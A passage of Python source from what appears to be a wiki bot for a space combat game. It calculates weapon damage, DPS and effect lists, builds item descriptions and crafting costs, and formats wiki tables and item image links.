t2Seconds = min(math.floor(t1End), math.floor(remaining))
totalDamage += 4 * shipMass * t2Seconds
remaining -= t2Seconds
# tier 3 calculation
if GeneralUtils.floatCmp(remaining, '>=', 1):
t3Seconds = math.floor(remaining)
totalDamage += 2 * shipMass * t3Seconds
remaining -= t3Seconds
elif effectName == 'Corrosion':
# Corrosion damage is time remaining as damage per second
totalDamage += (totalTime + (totalTime - secondsToCalc + 1)) * secondsToCalc / 2
else:
# If the effectTime > speedUpIfOver apply a damage multiplier
for j in range(0, secondsToCalc):
effectDamageMult = 1
if 'speedUpIfOver' in effectInfo and GeneralUtils.floatCmp(effectInfo['speedUpIfOver'], '>', 0):
if GeneralUtils.floatCmp(effectInfo['speedUpIfOver'], '<', totalTime):
effectDamageMult = totalTime / effectInfo['speedUpIfOver']
totalDamage += SmallConstants.effectDamagesData[effectName] * effectDamageMult
totalTime -= 1
# if Config.debug: print("totalDamage", totalDamage)
except KeyError:
pass
except:
if Config.debug:
raise
if totalDamage:
return round(totalDamage / (numShotsToTest * fireRate), 4)
def GetEffectNameListForItem(item):
rtnList = set()
itemType = GetItemType(item)
try:
if item['name'] == 'Red Mist Slammer':
rtnList.add('Red Mist Haze')
rtnList.add('Concussion')
elif item['name'] == 'Radii Nanite Repair':
rtnList.add('Fire Suppression')
rtnList.add('Shield Repair')
rtnList.add('Energy Recharge')
rtnList.add('Magnetic Disruption')
rtnList.add('Slow Down')
elif item['name'] == 'Radii Nanite Attack':
rtnList.add('Hard Light Decay')
rtnList.add('Propulsion Dehance')
rtnList.add('Corrosion')
rtnList.add('Energy Drain')
rtnList.add('Slow Down')
rtnList.add('Drift')
elif item['name'] == 'Ascendant Recovery Kit':
rtnList.add('Weapon Repel')
rtnList.add('Energy Recharge')
rtnList.add('Absorbing Stealth')
rtnList.add('Scanner Jammed')
rtnList.add('Slow Down')
elif item['effect'] > 0 or (item['effectTime'] > 0 and item['effect'] == 0):
if itemType == 'Shield':
effectName = GetShieldEffectName(item, False)
if effectName is None:
pass
elif effectName == 'Tornadian':
rtnList.add('Projectile Resist')
rtnList.add('Electrostatic Weakness')
elif effectName == 'Vampire':
rtnList.add('Anti Gravity')
elif effectName == 'Devimon':
rtnList.add('Anti Gravity')
rtnList.add('Heat Resist')
elif effectName == 'Enlightened':
rtnList.add('Heat Resist')
rtnList.add('Projectile Weakness')
elif effectName == 'Solarion':
rtnList.add('Heat Resist')
rtnList.add('Projectile Weakness')
rtnList.add('Freezing Weakness')
elif effectName == 'Rock':
rtnList.add('Explosive Resist')
rtnList.add('Laser Weakness')
rtnList.add('Photonic Weakness')
elif effectName == 'Refractive':
rtnList.add('Laser Resist')
rtnList.add('Photonic Resist')
rtnList.add('Explosive Weakness')
elif effectName == 'Andromedan':
rtnList.add('Stealth - Andromedan')
rtnList.add('Heat Weakness')
elif effectName == 'Dark':
rtnList.add('Anti Gravity')
rtnList.add('Cold Fusion Resist')
else:
rtnList.add(effectName)
else:
effectName = SmallConstants.effectsData[item['effect']]['name']
if effectName:
if effectName == 'Hellfire':
rtnList.add('Hellfire')
rtnList.add('Anti Stealth')
elif effectName == 'Holographic Disguise':
rtnList.add('Holographic Disguise')
rtnList.add('Drift')
else:
rtnList.add(effectName)
except:
pass
try:
if item['addEffect'] > 0 and item['effectTime'] > 0:
effectName = SmallConstants.effectsData[item['addEffect']]['name']
if effectName:
if effectName == 'Hellfire':
rtnList.add('Hellfire')
rtnList.add('Anti Stealth')
elif effectName == 'Holographic Disguise':
rtnList.add('Holographic Disguise')
rtnList.add('Drift')
else:
rtnList.add(effectName)
except:
pass
augType = GetItemAugType(item)
if augType == 'Self Torture':
rtnList.add('Heat Damage')
elif augType == 'Red Mist':
rtnList.add('Red Mist Haze')
elif augType == 'Fire Extinguisher':
rtnList.add('Fire Suppression')
elif augType == 'Fire Extinguisher':
rtnList.add('Fire Suppression')
elif augType == 'Drift':
rtnList.add('Drift')
return sorted(list(rtnList))
def GetRangeDataByRangeId(rangeId):
for rangeInfo in itemRangeData.values():
if rangeInfo['id'] == rangeId:
return rangeInfo
def GetItemDescription(item, useHtmlForLinks=False, performLinkReplacement=True):
from SFIWikiBotLib import ShipUtils
description = ''
skipVariants = False
if 'Mine Torpedo' not in item['name']:
skipVariants = True if 'Cloud' in item['name'] or 'Array' in item['name'] else False
itemRangeData = GetRangeDataForItem(item, skipVariants)
if itemRangeData and 'description' in itemRangeData:
description = itemRangeData['description'].replace('\r', ' ')
if description:
itemVariantData = GetVariantDataForItem(item)
if itemVariantData and 'descriptionAppend' in itemVariantData and itemVariantData['descriptionAppend']:
lchar = description[-1]
if lchar in ['.', '!', '?']:
description += ' '
else:
description += '. '
description += itemVariantData['descriptionAppend']
if not description:
if '__extData' in item and 'description' in item['__extData']:
description = item['__extData']['description']
description = re.sub('(Has [^:]* Effect)', '. \\1', description, re.S)
description = description.replace('.. Has', '. Has').replace('!. Has', '! Has').replace('?. Has', '? Has')
description = re.sub('Also depletes', '. Also depletes', description, re.S)
description = description.replace('.. Also depletes', '. Also depletes').replace('!. Also depletes', '! Also depletes').replace('?. Also depletes', '? Also depletes')
if not description:
skipVariants = False
itemRangeData = GetRangeDataForItem(item, skipVariants)
if itemRangeData and 'description' in itemRangeData:
description = itemRangeData['description'].replace('\r', ' ')
itemVariantData = GetVariantDataForItem(item)
if itemVariantData and 'descriptionAppend' in itemVariantData and itemVariantData['descriptionAppend']:
if description:
lchar = description[-1]
if lchar in ['.', '!', '?']:
description += ' '
else:
description += '. '
description += itemVariantData['descriptionAppend']
if not description:
return ''
lrange = ''
rangeWeaponName = ''
subWeaponName = ''
subWeaponLRange = ''
lifeTime = ''
amount = ''
level = ''
levelPlusTwo = ''
effect = ''
effectTime = ''
effectPerc = ''
invEffectPerc = ''
subShipName = ''
lifeTime = GetItemLife(item)
if lifeTime is not None:
lifeTime = GeneralUtils.NumDisplay(lifeTime, 1)
else:
lifeTime = ''
if 'amount' in item:
amount = item['amount']
if 'level' in item:
level = item['level'] + 1
levelPlusTwo = item['level'] + 2
if 'effectTime' in item:
effectTime = item['effectTime']
if 'effectAmount' in item:
effectPerc = "{}%".format(GeneralUtils.NumDisplay(item['effectAmount'] * 100, 0))
invEffectPerc = "{}%".format(GeneralUtils.NumDisplay((1-item['effectAmount']) * 100, 0))
try:
if 'effect' in item and item['effect'] >= 0:
effect = SmallConstants.effectsData[item['effect']]['name']
except:
print('Unable to get effect for id {} ({})'.format(item['effect'], item['name']))
try:
lrange = GeneralUtils.NumDisplay(GetItemRange(item))
if lrange:
lrange = "{}su".format(lrange)
except:
pass
try:
realRangeData = None
if itemRangeData and 'range' in itemRangeData:
realRangeData = GetRangeDataForItem(GetItemById(itemRangeData['range']))
if realRangeData and 'level' in item and item['level'] > 0 and item['level'] < len(realRangeData['items']):
rangeWeaponName = GetItemById(realRangeData['items'][item['level']])['name']
else:
rangeWeaponName = GetItemById(itemRangeData['range'])['name']
except:
pass
try:
subItem = GetItemSubWeapon(item)
nameObj = SplitNameIntoBaseNameAndItemLevel(subItem['name'])
subWeaponName = nameObj['fullNameMinusLevel']
subWeaponLRange = subItem['lockingRange']
if not subWeaponLRange: subWeaponLRange = GetItemRange(subItem)
if not subWeaponLRange: subWeaponLRange = 0
# Turrets only get half the range of their sub weapon
if 'augType' in item and item['augType'] == 15: subWeaponLRange *= 0.5
subWeaponLRange = GeneralUtils.NumDisplay(subWeaponLRange, 1)
if subWeaponLRange:
lrange = "{}".format(subWeaponLRange)
except:
pass
try:
subShip = ShipUtils.GetShipById(item['subWeaponID'])
subShipName = subShip['name']
except:
pass
description = description.replace('[lockingRange]', str(lrange))
description = description.replace('[weapon]', str(rangeWeaponName))
description = description.replace('[subWeapon]', str(subWeaponName))
description = description.replace('[subWeaponLockingRange]', str(subWeaponLRange))
description = description.replace('[lifeTime]', str(lifeTime))
description = description.replace('[life]', str(lifeTime))
description = description.replace('[amount]', str(amount))
description = description.replace('[level]', str(level))
description = description.replace('[levelPlusTwo]', str(levelPlusTwo))
description = description.replace('[effect]', str(effect))
description = description.replace('[effectPerc]', str(effectPerc))
description = description.replace('[invEffectPerc]', str(invEffectPerc))
description = description.replace('[effectTime]', str(effectTime))
description = description.replace('[subShip]', str(subShipName))
if performLinkReplacement:
description = GeneralUtils.AddWikiLinksToText(description, useHtmlForLinks)
return description
def GetItemSourceExtended(item, includeLink=False):
source = None
if IsItemHidden(item):
source = "Unavailable"
elif 'seasonal' in item and item['seasonal']:
source = "Purchased ([[:Category:Seasonal_Items|Seasonal]])"
elif 'buyable' in item and item['buyable']:
source = "Purchased"
elif 'race' in item and item['race'] <= 1 and item['name'] != 'Micro Gate TBZ' and GetItemBPLocation(item):
source = "Crafted"
if includeLink and Config.craftingPageName:
if source != Config.craftingPageName:
source = "[[{}|{}]]".format(Config.craftingPageName, source)
else:
source = "[[{}]]".format(source)
elif 'race' in item and item['race'] > 1:
source = "Rare Drop"
if 'equipCategory' in item and item['equipCategory'] == 7:
source = "Ultra Rare"
elif IsItemNprExclusive(item):
source = "NPR Exclusive"
nprName = GetRaceForItem(item)
if not includeLink:
source += " ({})".format(nprName)
else:
wikiPage = WikiUtils.GetNprWikiPageByNprName(nprName)
if wikiPage == nprName:
source += " ([[{}]])".format(nprName)
else:
source += " ([[{}|{}]])".format(wikiPage, nprName)
elif item['id'] in rarePlayerRaceDropIdList:
source = "Rare Drop"
return source
def GetItemSource(item):
source = "Unknown"
if 'seasonal' in item and item['seasonal']:
source = "Purchased (Seasonal)"
elif 'buyable' in item and item['buyable']:
source = "Purchased"
elif 'race' in item and item['race'] <= 1 and item['name'] != 'Micro Gate TBZ' and (GetItemBPLocation(item)):
source = "Crafted"
elif 'race' in item and item['race'] > 1:
source = "Rare Drop"
if 'equipCategory' in item and item['equipCategory'] == 7:
source = "Ultra Rare"
elif IsItemNprExclusive(item):
source = "NPR Exclusive"
elif item['id'] in rarePlayerRaceDropIdList:
source = "Rare Drop"
return source
def GetItemSourceClassName(item):
source = GetItemSource(item)
if source == "Purchased (Seasonal)":
return 'seasonalItem'
elif source == "Purchased":
return 'storeItem'
elif source == "Crafted":
return 'craftedItem'
elif source == "Rare Drop":
return 'nprItem'
elif source == "NPR Exclusive":
return 'nprExclusiveItem'
elif source == "Ultra Rare":
return 'nprUltraRareItem'
return None
def GetItemSkillName(item):
try:
return SmallConstants.skillsData[item['skillRequirement']['skill']]['name']
except:
return ""
def GetItemSkillLevel(item):
try:
return item['skillRequirement']['level']
except:
return 999
def ShortenSkillName(skillName):
skillName = skillName.upper()
if skillName == "EXPLOSIVES":
return "EX"
if skillName == "LIGHT":
return "LT"
if skillName == "PROGRAMMING":
return "PR"
if skillName == "SHIELDS":
return "SH"
return skillName[0:1]
def GetItemDps(item):
dps = None
with suppress(ZeroDivisionError, KeyError):
if IsBeamWeapon(item) and GeneralUtils.floatCmp(item['fireRate'], '==', 0):
dps = GetDamagePerRoundForItem(item)
elif DisplayDamageAsPerHit(item):
dps = GetItemTotalHitCount(item) * GetDamagePerRoundForItem(item) / item['fireRate']
else:
dps = GetDamagePerRoundForItem(item) / item['fireRate']
dps *= GetNumOfDamagingProjectiles(item)
return dps
def GetItemDpsIncludingEffectDamage(item):
with suppress(KeyError):
if item['augType'] == 15:
subWeapon = GetItemSubWeapon(item)
if subWeapon:
return GetItemDpsIncludingEffectDamage(subWeapon)
dps = None
if DisplayDamageAsPerSecond(item):
dps = GetDamagePerRoundForItem(item)
if 'amount' in item and item['amount'] > 1:
dps *= item['amount']
elif DisplayDamageAsPerHit(item):
dps = GetItemTotalHitCount(item) * GetDamagePerRoundForItem(item) / item['life']
else:
dps = GetDamagePerRoundForItem(item) / item['fireRate']
dps *= GetNumOfDamagingProjectiles(item)
effectDps = GetItemEffectDamagePerSecond(item)
if effectDps:
try:
dps += effectDps
except:
dps = effectDps
return dps
def GetItemDpe(item):
dpe = None
with suppress(KeyError):
damage = GetDamagePerRoundForItem(item)
if damage > 0 and GeneralUtils.floatCmp(item['ammoOrEnergyUsage'], '>', 0) and item['energyBased']:
if DisplayDamageAsPerHit(item):
damage *= GetItemTotalHitCount(item)
else:
damage *= GetNumOfDamagingProjectiles(item)
dpe = damage / item['ammoOrEnergyUsage']
return dpe
def GetItemDpeIncludingEffectDamage(item):
dpe = None
with suppress(KeyError):
damage = GetDamagePerRoundForItem(item)
if damage and GeneralUtils.floatCmp(item['ammoOrEnergyUsage'], '>', 0) and item['energyBased']:
if DisplayDamageAsPerHit(item):
damage *= GetItemTotalHitCount(item)
else:
damage *= GetNumOfDamagingProjectiles(item)
effectDamage = GetItemEffectDamage(item)
if effectDamage:
damage += effectDamage
dpe = damage / item['ammoOrEnergyUsage']
return dpe
def GetItemAugType(item):
augType = None
try:
if item['augType'] >= 0:
augType = SmallConstants.augTypeLookup[item['augType']]
if augType == 'SEBalancer':
augType = 'S/E Balancer'
else:
augType = GeneralUtils.CamelCaseToTitleCase(augType.replace('_', ''))
except:
pass
return augType
def GetItemBPLocation(item):
f = GetItemBPLocation
if "locRegex" not in f.__dict__:
f.locRegex = re.compile(r'^([A-Z][a-zA-Z0-9]*-[0-9]+-[0-9]+) \(')
locRegex = f.locRegex
with suppress(AttributeError, KeyError):
return Config.bpLocationOverride[item['name']]
rtnVal = ''
craftingData = GetCraftingDataForItem(item)
if craftingData:
if 'isSystemMicroGate' in craftingData and craftingData['isSystemMicroGate']:
itemIdx = 0
else:
itemIdx = craftingData['items'].index(item['id'])
if len(craftingData['locations']) > itemIdx:
rtnVal = craftingData['locations'][itemIdx]
if not rtnVal:
with suppress(KeyError):
loc = item['__extData']['blueprintlocation']
if loc.lower() == 'not yet available':
rtnVal = 'N/A'
else:
rtnVal = loc
m = locRegex.match(rtnVal)
if m:
rtnVal = m.group(1)
return rtnVal
def GetItemEffectTime(item):
effectTime = -1
try:
if item['effect'] >= 0:
effectTime = item['effectTime']
except:
pass
return effectTime
def GetItemPurchasePrice(item):
if 'weaponType' in item and item['weaponType'] == 5:
return int(GeneralUtils.RoundToSignificantAmount(item['price'] * itemPurchasePriceModifier, False, False, True))
return int(GeneralUtils.RoundToSignificantAmount(item['price'] * itemPurchasePriceModifier))
def GetItemAmmoCost(item):
if 'energyBased' in item and item['energyBased']:
return 0
if 'weaponType' in item and item['weaponType'] == 5:
return item['price']
return int(GeneralUtils.RoundToSignificantAmount(item['price'] * ammoCostModifier, True))
def GetWeaponEffectName(item):
effect = None
try:
if item['effect'] >= 0 and (item['type'] == 2 or item['type'] == 3):
effect = SmallConstants.effectsData[item['effect']]['name']
except:
pass
return effect
def GetItemCraftingRecipe(item):
"""Determine the crafting cost for an item and return a dictionary with the values"""
rtnInfo = {
'creditCost': 0,
'ingredientList': {},
}
smallValue = True
itemCraftingData = GetCraftingDataForItem(item)
if itemCraftingData:
rtnInfo['creditCost'] = GetCraftingCreditCostForItem(item)
for ingredient in itemCraftingData['ingredients']:
qty = ingredient['quantityRequired'] * (1 + (item['level'] * 0.333334))
rtnInfo['ingredientList'][ingredient['mineralID']] = GeneralUtils.RoundToSignificantAmount(qty, smallValue)
return rtnInfo
def GetCraftingCreditCostForItem(item):
item = GetAllItemsSharingItemRange(item)[0]
itemCraftingData = GetCraftingDataForItem(item)
if itemCraftingData:
if 'creditCost' in itemCraftingData:
return itemCraftingData['creditCost']
priceMult = 0.281
amountToAddPerIngredient = 150
price = GetItemPurchasePrice(item)
mineralCount = len(itemCraftingData['ingredients'])
calculatedValue = price * priceMult + (amountToAddPerIngredient * mineralCount)
smallValue = True
allowDec = False
largeValue = True
return GeneralUtils.RoundToSignificantAmount(calculatedValue, smallValue, allowDec, largeValue)
def GetShieldEffectName(item, includeEffectLevel=False):
rtnVal = None
try:
if item['effect'] > 0 and item['type'] == 5:
effect = SmallConstants.effectLookup[item['effect']].replace('_', ' ').title()
effectPercentage = GeneralUtils.NumDisplay(item['effectAmount'] * 100, 0)
if effectPercentage != '0':
if includeEffectLevel:
rtnVal = '{} ({}%)'.format(effect, effectPercentage)
else:
rtnVal = effect
except:
pass
return rtnVal
def GetImageUploadDownloadInfoForItem(item):
itemType = SmallConstants.typeLookup[item['type']].replace('_WEAPON', '').title()
iconName = item['id']
if 'iconName' in item and item['iconName']:
iconName = item['iconName']
filepath = os.path.join('public', 'images', itemType, "{}.png".format(iconName))
rtnVal = {
'description': '{} - {}'.format(ItemDisplayStatItemType(item), item['name']),
'exists': os.path.exists(filepath),
'filepath': filepath,
'filename': "{}.png".format(iconName),
'name': "{}_{}.png".format(itemType, iconName),
'url': GetItemImageUrl(item),
'subDir': itemType,
}
return rtnVal
def GetItemType(item):
rtnVal = ""
if item['type'] == 3:
rtnVal = SmallConstants.weaponTypeLookup[item['weaponType']]
# rtnVal += " Secondary"
else:
rtnVal = SmallConstants.typeLookup[item['type']]
rtnVal = rtnVal.replace('_', ' ').title()
return rtnVal
def GetWikiPageForItemType(type):
# Cheating since I already know the relevant page names
# Todo - expand this section to cover several possibilities, in case of future name changes
if type in ['Primary Weapon', 'Mine', 'Engine', 'Shield', 'Augmentation']:
return WikiUtils.GetWikiArticlePageForNameList([type + 's'])
if type == 'Utility':
return WikiUtils.GetWikiArticlePageForNameList(['Utilities'])
if type == 'Standard':
return WikiUtils.GetWikiArticlePageForNameList(['Standard Weapons', 'Standard Secondary Weapons'])
return WikiUtils.GetWikiArticlePageForNameList([type + ' Weapons'])
def GetItemImageUrl(item):
rtnVal = ''
itemType = SmallConstants.typeLookup[item['type']].replace('_WEAPON', '').title()
iconName = item['id']
if 'iconName' in item and item['iconName']:
iconName = item['iconName']
# rtnVal = "https://www.benoldinggames.co.uk/sfi/gamedata/icons/{}/{}.png".format(itemType, iconName)
rtnVal = "https://www.benoldinggames.co.uk/sfi/gamedata/icons/allItems/{}.png".format(iconName)
return rtnVal
def GetItemWikiImage(item):
rtnVal = ''
itemType = SmallConstants.typeLookup[item['type']].replace('_WEAPON', '').title()
iconName = item['id']
if 'iconName' in item and item['iconName']:
iconName = item['iconName']
itemNameList = []
itemNameList.append("{} {}".format(itemType, iconName))
itemNameList.append(item['name'])
splitItemName = SplitNameIntoBaseNameAndItemLevel(item['name'])
if splitItemName['fullNameMinusLevel'] != item['name']:
itemNameList.append(splitItemName['fullNameMinusLevel'])
rtnVal = WikiUtils.GetWikiImageForNameList(itemNameList)
return rtnVal
def GetItemWikiArticlePage(item, p=...):
type = GetItemType(item)
itemNameList = [
item['name'],
"{} {}".format(item['name'], type),
"{} {}".format(item['name'], GeneralUtils.GetPluralForm(type)),
]
splitItemName = SplitNameIntoBaseNameAndItemLevel(item['name'])
if splitItemName['fullNameMinusLevel'] != item['name'] :
itemNameList.insert(0, splitItemName['fullNameMinusLevel'])
itemNameList.insert(0, "{} {}".format(splitItemName['fullNameMinusLevel'], GeneralUtils.GetPluralForm(type)))
itemNameList.insert(0, "{} {}".format(splitItemName['fullNameMinusLevel'], type))
itemArticlePage = WikiUtils.GetWikiArticlePageForNameList(itemNameList)
if itemArticlePage:
return itemArticlePage
def GetDefaultTableInfoByItemType(itemType, weaponType=..., pageType=''):
rtnInfo = {
'tableHeader': None,
'tableCaption': None,
'tableClassNames': 'wikitable sortable',
'tableColumnList': [],
'tableColumnTitleList': [],
}
if itemType == 1: # Mineral
rtnInfo['tableHeader'] = 'Minerals'
rtnInfo['tableColumnList'] = [ 'Name', 'Image' ]
elif itemType == 2: # Primary Weapon
rtnInfo['tableHeader'] = 'Primary Weapons'
rtnInfo['tableColumnList'] = ['Item','Dmg','TD','DPS','ROF','EU','DPE','Rng','Lt','MS','Ac','Effect','Sk']
elif itemType == 3: # Secondary Weapon
if weaponType == 1: # Standard
rtnInfo['tableHeader'] = 'Standard Secondary Weapons'
rtnInfo['tableColumnList'] = ['Item','Dmg','TD','DPS','ROF','Am','EU','Rng','MS','Trn','Effect','Sk']
elif weaponType == 2: # Utility
rtnInfo['tableHeader'] = 'Utilities'
rtnInfo['tableColumnList'] = ['Item','Dmg','Ammo','EU','Rng','Turn','Effect','Notes','Sk']
elif weaponType == 3: # Mine
rtnInfo['tableHeader'] = 'Mines'
rtnInfo['tableColumnList'] = ['Item','Dmg','TD','ROF','Am','EU','Arm','Lt','Effect','Sk']
elif weaponType == 4: # Proximity
rtnInfo['tableHeader'] = 'Proximity Weapons'
rtnInfo['tableColumnList'] = ['Item','Dmg','TD','ROF','Am','EU','Lt','Rng','Effect','Notes','Sk']
elif weaponType == 5: # Large
rtnInfo['tableHeader'] = 'Large Weapons'
rtnInfo['tableColumnList'] = ['Item','Dmg','TD','Range','Lt','Ammo','Cost','Ammo Cost','Notes','Sk']
elif itemType == 4: # Engine
rtnInfo['tableHeader'] = 'Engines'
rtnInfo['tableColumnList'] = ['Item','Speed','Reverse','Accel','Turning','Prop','Prop Time','Sk']
elif itemType == 5: # Shield
rtnInfo['tableHeader'] = 'Shields'
rtnInfo['tableColumnList'] = ['Item','Maximum Charge Multiplier','Charge Rate','Charge Delay','Effect Icons','Secondary Effects','Sk']
elif itemType == 6: # Augmentation
rtnInfo['tableHeader'] = 'Augmentations'
rtnInfo['tableColumnList'] = ['Item','Notes','Cost','Sk']
elif itemType == 14: # Collectible
rtnInfo['tableHeader'] = 'Collectibles'
rtnInfo['tableColumnList'] = ['Name','Image']
if pageType and pageType is not ...: pageType = pageType.lower()
if pageType == 'crafting':
rtnInfo['tableColumnList'].append('BP Location')
if itemType == 2: # Primary Weapon
try:
index = rtnInfo['tableColumnList'].index('Ac')
rtnInfo['tableColumnList'] = rtnInfo['tableColumnList'][:index] + rtnInfo['tableColumnList'][index+1:]
rtnInfo['tableColumnTitleList'] = rtnInfo['tableColumnTitleList'][:index] + rtnInfo['tableColumnTitleList'][index+1:]
except ValueError:
pass
try:
index = rtnInfo['tableColumnList'].index('Effect')
rtnInfo['tableColumnList'] = rtnInfo['tableColumnList'][:index] + rtnInfo['tableColumnList'][index+1:]
rtnInfo['tableColumnTitleList'] = rtnInfo['tableColumnTitleList'][:index] + rtnInfo['tableColumnTitleList'][index+1:]
except ValueError:
pass
try:
index = rtnInfo['tableColumnList'].index('Cost')
rtnInfo['tableColumnList'] = rtnInfo['tableColumnList'][:index] + rtnInfo['tableColumnList'][index+1:]
rtnInfo['tableColumnTitleList'] = rtnInfo['tableColumnTitleList'][:index] + rtnInfo['tableColumnTitleList'][index+1:]
except ValueError:
pass
elif pageType == 'npr':
try:
index = rtnInfo['tableColumnList'].index('Skill')
rtnInfo['tableColumnList'] = rtnInfo['tableColumnList'][:index] + rtnInfo['tableColumnList'][index+1:]
rtnInfo['tableColumnTitleList'] = rtnInfo['tableColumnTitleList'][:index] + rtnInfo['tableColumnTitleList'][index+1:]
except ValueError:
pass
try:
index = rtnInfo['tableColumnList'].index('Sk')
rtnInfo['tableColumnList'] = rtnInfo['tableColumnList'][:index] + rtnInfo['tableColumnList'][index+1:]
rtnInfo['tableColumnTitleList'] = rtnInfo['tableColumnTitleList'][:index] + rtnInfo['tableColumnTitleList'][index+1:]
except ValueError:
pass
rtnInfo['tableColumnTitleList'] = GetStatNameDescriptions(rtnInfo['tableColumnList'], pageType)
return rtnInfo
def ItemDisplayStatDamage(item, p=..., includeProjectileDisplay=True):
damagePerRound = GetDamagePerRoundForItem(item)
if GeneralUtils.floatCmp(damagePerRound, '==', 0):
return ''
rtnVal = GeneralUtils.NumDisplay(damagePerRound, 1)
if DisplayDamageAsPerSecond(item):
rtnVal = "{}/s".format(rtnVal)
elif DisplayDamageAsPerHit(item):
rtnVal = "{}/hit".format(rtnVal)
if includeProjectileDisplay:
amount = GetNumOfDamagingProjectiles(item, True)
if amount > 1:
rtnVal = "{} x{}".format(rtnVal, amount)
rtnVal = '{} {}'.format(rtnVal, GetDamageTypeIconForItem(item))
return rtnVal.strip()
def ItemDisplayStatTotalDamagePerVolley(item, p=..., includeIcons=False):
rtnVal = None
message = None
totalDamage = 0
effectName = None
try:
subWeapon = GetItemSubWeapon(item)
if subWeapon:
effectName = SmallConstants.effectsData[subWeapon['effect']]['name']
else:
effectName = SmallConstants.effectsData[item['effect']]['name']
except:
pass
totalDamage = GetItemTotalDamagePerVolley(item)
rtnVal = GeneralUtils.NumDisplay(totalDamage, 2)
effectDamage = GetItemEffectDamage(item)
if GeneralUtils.floatCmp(effectDamage, '>', 0):
message = "Includes {} damage from {}".format(GeneralUtils.NumDisplay(effectDamage, 1), effectName)
if effectName == 'Radiation Damage':
message += '.\nDamage is approximate depending on the mass of the target ship as well as whether the effect is refreshed. Estimation is for no refresh, ship mass of {}'.format(GeneralUtils.NumDisplay(Config.shipMassForDamageCalculation, 2))
elif effectName == 'Corrosion':
message += '.\nDamage is approximate depending on whether the effect is refreshed. Estimation is for no refresh'
if DisplayDamageAsPerHit(item):
message += ' and assumes all hits land on the target.'
elif GetNumOfDamagingProjectiles(item, True) > 1:
message += ' and assumes all projectiles hit the target.'
else:
message += '.'
if message:
rtnVal = '<span class="itemStatDetails" title="{}">{}</span>'.format(message, rtnVal)
if includeIcons:
if GeneralUtils.floatCmp(GetDamagePerRoundForItem(item), '>', 0):
rtnVal = '{} {}'.format(rtnVal, GetDamageTypeIconForItem(item)).strip()
if GeneralUtils.floatCmp(effectDamage, '>', 0):
rtnVal = '{} {}'.format(rtnVal, GetEffectIconForItem(item)).strip()
return rtnVal
def ItemDisplayStatRateOfFire(item, p=...):
try:
if item['augType'] == 15:
subWeapon = GetItemSubWeapon(item)
if subWeapon: return ItemDisplayStatRateOfFire(subWeapon, p)
except:
pass
if item['fireRate'] > 0:
fireRate = item['fireRate']
if fireRate <= 1:
return "{} per sec".format(GeneralUtils.NumDisplay(1/fireRate, 1))
return "1 per {} sec".format(GeneralUtils.NumDisplay(fireRate, 1))
def ItemDisplayStatRateOfFireShort(item, p=...):
try:
if item['augType'] == 15:
subWeapon = GetItemSubWeapon(item)
if subWeapon: return ItemDisplayStatRateOfFire(subWeapon, p)
except:
pass
if item['fireRate'] > 0:
fireRate = item['fireRate']
if fireRate <= 1:
return "{}/s".format(GeneralUtils.NumDisplay(1/fireRate, 1))
return "1/{}s".format(GeneralUtils.NumDisplay(fireRate, 1))
def ItemDisplayStatDps(item, p=...):
return GeneralUtils.NumDisplay(GetItemDps(item), 1)
def ItemDisplayStatTotalDps(item, p=..., includeIcons=False):
rtnVal = None
message = None
totalDps = 0
effectName = None
try:
subWeapon = GetItemSubWeapon(item)
if subWeapon:
effectName = SmallConstants.effectsData[subWeapon['effect']]['name']
else:
effectName = SmallConstants.effectsData[item['effect']]['name']
except:
pass
totalDps = GetItemDpsIncludingEffectDamage(item)
rtnVal = GeneralUtils.NumDisplay(totalDps, 1)
effectDps = GetItemEffectDamagePerSecond(item)
if GeneralUtils.floatCmp(effectDps, '>', 0):
message = "Includes {} dps from {}".format(GeneralUtils.NumDisplay(effectDps, 1), effectName)
if effectName == 'Radiation Damage':
message += '.\nDamage is approximate depending on the mass of the target ship. Estimation assumes a target ship mass of {}, with only this weapon applying the effect, firing as often as possible'.format(GeneralUtils.NumDisplay(Config.shipMassForDamageCalculation, 2))
else:
message += '.\nDamage is approximate and assumes only this weapon is applying the effect, firing as often as possible'
if GetNumOfDamagingProjectiles(item, True) > 1:
message += ' and assumes all projectiles hit the target.'
else:
message += '.'
if message:
rtnVal = '<span class="itemStatDetails" title="{}">{}</span>'.format(message, rtnVal)
if includeIcons:
if GeneralUtils.floatCmp(GetDamagePerRoundForItem(item), '>', 0):
rtnVal = '{} {}'.format(rtnVal, GetDamageTypeIconForItem(item)).strip()
if GeneralUtils.floatCmp(effectDps, '>', 0):
rtnVal = '{} {}'.format(rtnVal, GetEffectIconForItem(item)).strip()
return rtnVal
def ItemDisplayStatDpe(item, p=...):
return GeneralUtils.NumDisplay(GetItemDpe(item), 2)
def ItemDisplayStatTotalDpe(item, p=...):
rtnVal = None
totalDpe = GetItemDpeIncludingEffectDamage(item)
if totalDpe:
message = None
effectName = None
try:
subWeapon = GetItemSubWeapon(item)
if subWeapon:
effectName = SmallConstants.effectsData[subWeapon['effect']]['name']
else:
effectName = SmallConstants.effectsData[item['effect']]['name']
except:
pass
rtnVal = GeneralUtils.NumDisplay(totalDpe, 2)
effectDamage = GetItemEffectDamage(item)
if effectDamage:
message = "{} of this amount comes from {}".format(GeneralUtils.NumDisplay(effectDamage / item['ammoOrEnergyUsage'], 1), effectName)
if effectName == 'Radiation Damage':
message += '.\nDamage is approximate depending on the mass of the target ship as well as whether the effect is refreshed. Estimation is for no refresh, ship mass of {}'.format(GeneralUtils.NumDisplay(Config.shipMassForDamageCalculation, 2))
elif effectName == 'Corrosion':
message += '.\nDamage is approximate depending on whether the effect is refreshed. Estimation is for no refresh'
if GetNumOfDamagingProjectiles(item, True) > 1:
message += ' and assumes all projectiles hit the target.'
else:
message += '.'
if message:
rtnVal = '<span class="itemStatDetails" title="{}">{}</span>'.format(message, rtnVal)
return rtnVal
def ItemDisplayStatEnergyRequired(item, p=...):
rtnVal = ""
if 'energyUsage' in item and GeneralUtils.floatCmp(item['energyUsage'], '>', 0):
rtnVal = GeneralUtils.NumDisplay(item['energyUsage'], 2)
if not rtnVal and GeneralUtils.floatCmp(item['ammoOrEnergyUsage'], '>', 0) and item['energyBased']:
rtnVal = GeneralUtils.NumDisplay(item['ammoOrEnergyUsage'], 2)
if IsBeamWeapon(item):
rtnVal = "{}/s".format(item['ammoOrEnergyUsage'])
return rtnVal
def ItemDisplayStatImage(item, p=...):
rtnVal = ""
title = item['name']
splitItemName = SplitNameIntoBaseNameAndItemLevel(item['name'])
if splitItemName['fullNameMinusLevel'] != item['name']:
title = splitItemName['fullNameMinusLevel']
imageName = GetItemWikiImage(item)
if imageName:
rtnVal = '[[File:{}|thumb|55x55px]]'.format(imageName)
